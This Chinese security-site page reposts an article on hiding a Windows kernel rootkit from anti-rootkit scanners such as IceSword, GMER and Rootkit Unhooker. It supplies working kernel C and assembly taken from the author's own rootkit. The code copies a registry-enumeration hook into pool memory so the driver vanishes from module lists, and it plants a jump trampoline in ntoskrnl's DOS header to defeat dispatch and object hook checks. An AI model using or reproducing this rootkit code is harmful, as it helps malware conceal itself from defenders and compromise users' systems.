主页 PC知识 网管技术 黑客帝国 安全技术 开放系统 程序设计 搜索 技术论坛

 

相关联接
 
RHU本级分类

新手入门
入侵实例
工具使用
安全防范
黑客人物
软件破解
漏洞研究
 
RHU阅读排行
·servU 6.0.0.2 本地权限提升漏洞的利用
·OBLOG函数adodb_loadfile()暴库分析[终结]
·DriverStudio Remote Control远程调用认证绕过漏洞及其利用研究
·利用ORACLE的system帐户默认口令提升权限
·NeTop+漏洞总结详细翻译文档
·Kaspersky杀毒软件klif.sys权限提升漏洞
·关于leadbbs论坛的Cookie欺骗漏洞
·博客入侵太简单 四大漏洞入侵博客
·leadbbs移花接木漏洞与加入黑客木马
·如何利用终端服务入侵远程计算机

 
 
RHU最新文章
·绕过现代Anti-Rookit工具的内核模块扫描(ZT)
·IIS的NSIISLOG.DLL溢出问题分析
·Skype Web 发现内容区远程代码执行漏洞
·手工添加后门中的系统服务
·通过 Windows 注册表修改 PHP 配置
·默认账号for Routers/Switches/Hubs 及其他
·网站编辑器eWebEditor漏洞
·Fckeditor <=2.4.2 For php 任意上传文件漏洞
·思科网络安全软件代理存在远程缓存溢出漏洞
·Apple QuickTime RTSP响应头远程栈溢出漏洞

 
 
RHU相关搜索









 
 
RHU广而告之

 
 
>您的位置:首页 -> 黑客帝国-> 漏洞研究
绕过现代Anti-Rookit工具的内核模块扫描(ZT)

作者:RHU-TAC编辑员 来自:RHU网络采集 时间:2008-2-22 双击滚屏 收藏本页 字体:

点击 查看RHU2004全年文章


MJ0011
th_decoder@126 . com
2007 - 10 - 24
本文描述了一些方法,可以饶过目前主流的现代Anti - rootkit工具,包括但不限于 :
Icesword 最新版
Gmer最新版
Rootkit unhooker 最新版
DarkSpy 最新版
AVG Anti - rootkit最新版
等等

目前的anti - rootkit工具中,对于内核模块主要采用如下几种扫描方式 :

1. 恢复ZwQuerySystemInformation的hook , 然后利用功能号SystemModuleInformation进行枚举
例如Icesword

2. 遍历PsLoadModuleList , Driver / Device / Section Object链 , 或者TypeList链等 ( 总之是找驱动相关对象 ) 进行枚举
例如Rootkit Unhooker , Gmer等

3. 内核镜象暴力搜索 , 搜索MZ , PE等等标志结合进行判断内存里是否有PE镜象 , 如rootkit unhooker , rutkowska的modgreper等,通常只能显示为unknow image

4. 函数引用 , 各种routine\hook等 , 先HOOK一些常用函数,然后当驱动去调用这些函数时,记下其地址,检测时使用 , 或者是根据各种 routine ( dispatch routine , IDT , Image Notfiy等 ) 或各种hook ( inline hook , iat / eat hook等等 ) ,通常只能显示为unknow image或unknow xxx handler等

5. 使用系统ImageLoad Notfiy , 使用一个BOOT驱动,记录所有模块load的消息 , 检测时进行分析 如AVG Anti - rootkit等

先说饶过 1 , 2 , 3 , 5 的办法
很简单,使用诸如ZwSetSystemInformation的函数加载驱动,然后在DriverEntry中分配NonPagedPool的内存,然后将功能代码 / 函数copy到该内存中,然后进行必要的HOOK,最后返回STATUS_UNSUCCESSFULL .

这样驱动在PsLoadModuleList、各种对象链里就消失了,自然也就不存在于ZwQuerySystemInformation枚举的列表里
需要注意的是,copy到内存中的代码要尽量简单,基本不会生成需要重定位的代码了,但调用系统函数还是要另想办法

我的某个RK里是这样做的,例如A Function用来hook 系统函数B , 其中需要调用系统函数C,

那么分配一块内存,大小 = len ( A ) + sizeof ( ULONG ) * 2

在内存的前两个DWORD放OrgB , 以及C的地址,后面开始放函数代码

函数中使用call + 5 对自身的位置进行定位,找到内存开始的位置,然后得到OrgB和C

当然也可以在COPY入内存前自己用绝对地址定位函数 ~ 不过不如这个方法灵活

相关代码 :
//hook call CmEnumerateValueKey

void InstallCMRegHook ()
{
PVOID _CmEnumerateKeyValueLoc ;


_CmEnumerateKeyValueLoc = FindCmEnumerateValueKey ();
//找到 call CmEnumerateValueKey

HookCodeLen = ( ULONG ) NopFunc8 - ( ULONG ) NewCmEnumerateValueKey ;
//获得NewCmEnumerateValueKey长度

HookCode3 = ExAllocatePoolWithTag ( NonPagedPool ,
HookCodeLen + 4 ,
MEM_TAG_HOOKCODE3 );

//分配内存

*( ULONG *) HookCode3 = *( ULONG *) _CmEnumerateKeyValueLoc ;

//原函数地址放入内存

RtlCopyMemory (( PVOID ) HookCode3 + sizeof ( ULONG ) , ( PVOID ) NewCmEnumerateValueKey , HookCodeLen );

//copy函数代码

DO_SPINLOCK ();
*( ULONG *) _CmEnumerateValueKeyLoc = HookCode3 + sizeof ( ULONG );

//进行HOOK

EXIT_SPINLOCK ();
return ;

}

NTSTATUS NewCmEnumearateValueKey ( IN PVOID KeyControlBlock ,
IN ULONG Index ,
IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass ,
IN PVOID KeyValueInformation ,
IN ULONG KeyLength ,
IN PULONG ResultLength
)
{
//下面找到本函数开始地址,并获得保存在内存中的OrgCmEnumerateValueKey的地址
__asm
{
push eax
call __
__ :
POP eax
SUB eax , offset __
add eax , offset NewCmEnumearateValueKey

; 获得函数开始地址

sub eax , 4  
mov eax ,[ eax ]

; 获得OrgCmEnumerateValueKey

push ResultLength
push KeyLength
push KeyValueInformation
push KeyValueInformationClass
push Index
push KeyControlBlock
call eax  
mov stat , eax
; 调用原始函数
pop eax
}

//.....其他处理
//
//.....
}

void NopFunc8 ()
{
__asm
{
nop
nop
nop
}
return ;
}

//上面这个NopFunc用于NewCmEumerateValueKey函数长度定位

这样,基于ZwQuerySystemInformation , PsLoadModuleList , 对象目录,Type链 , ImageLoad , 暴力PE搜索 ( 因为我们压根就没有PE镜象 , just one piece of code ~)...

接下来看如何饶过 4. 中的检测方式

1.Hook 常用函数 : 这个很简单了,恢复自己要用的函数 ~ 或者压根就不用那些函数,HOOK代码大部分都是数据过滤 / 处理部分,所以完全可以一个系统函数也不调 ...

2. 各种routine检测,这个可以用多次跳转方式搞定,例如Dispatch hook , 因为获取各种DRIVER的DISPATCH 原始地址没有比较通用的方法,所以检测dispatch是否被HOOK的方式通常都是检测其地址是否在其模块的Code Section中 ( 类似的还有object hook , pxxxx hook等 ), 使用此方法的例如rootkit unhooker , gmer等

只要我们先使用这样的方法,就可以饶过检测,让Anti - rootkit工具不知道是我们的模块HOOK了这里 :

先将dispatch地址跳转到code section中不用的部分, 5 个字节就足够了,然后在这 5 个字节里使用jmp指令再跳到我们的模块里,这样Anti - rootkit工具检测时 , 就会发现dispatch routine仍然在该模块的code section中

通过这种方法也可以饶过对dispatch hook\object hook的检测

inline hook / iat / eat hook也可以用类似的方法来躲过模块检测,不过无法避免HOOK被检测到 ^-^

即使Anti - rootkit工具使用更复杂的算法,对各个routine进行深度代码级扫描 , 我们也可以通过复杂逻辑/代码,将我们的最后跳转地址藏起来:)

一个简单的双段跳饶过object hook检测的代码 :
object hook方法因为未被公开过,故细节略去,方便起见,没有写找code section的代码,直接将跳转代码写到了ntoskrnl的DOS Header中
同样来自于我的某RK :
ULONG InsideHookCode ( ULONG NewAddress , ULONG BaseCode )
{
//该函数用于将hook代码转接到模块的DOS头中

//in :NewAddress: real hookcode to jump
//in :ModuleName: kernel module base address to inject
//out :NewJump Address

ULONG TempCode = BaseCode ;

TempCode = TempCode + sizeof ( IMAGE_DOS_HEADER ) ;
//into DOS stub

DO_SPINLOCK ();
WPOFF ();

*( BYTE *) TempCode = 0xe9 ;
__asm
{
push eax
push ecx
mov ecx , TempCode
mov eax , NewAddress
sub eax , ecx
sub eax , 5
mov dword ptr [ ecx + 1 ] , eax
pop ecx
pop eax
}

WPON ();
EXIT_SPINLOCK ();

//write jmp NewAddress into DOS stub
return TempCode ;
}

OVER
[1] 页 RedHyphone.Union 投稿邮箱
[特别声明]:
本站文章大多搜索转载自网络中,如果侵犯了您的权利,请告之我们。本站将立即删除。
本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。
查看评论】【向上滚屏】【关闭窗口】【 打印
-相关文章
  • IIS的NSIISLOG.DLL溢出问题分析
  • Skype Web 发现内容区远程代码执行漏洞
  • 怎样检测不同操作系统下黑客发起的攻击
  • USB设备的危险防止数据泄漏三策略
  • 防火墙的分类及优缺点综述
    		•
    -文章评论 (关闭)
    ·还没有相关的评论!

    网上大名:
    红旋风网络技术联盟 RHUTech.Union
     
    Copyright © 2000-2007 RedHyphone.Union All Rights Reserved. 红旋风联盟版权所有.皖ICP备05011033号
    中国红旋风网络技术联盟 | www.RedHyphone.net
    Mailto:Redhyphone@gamil.com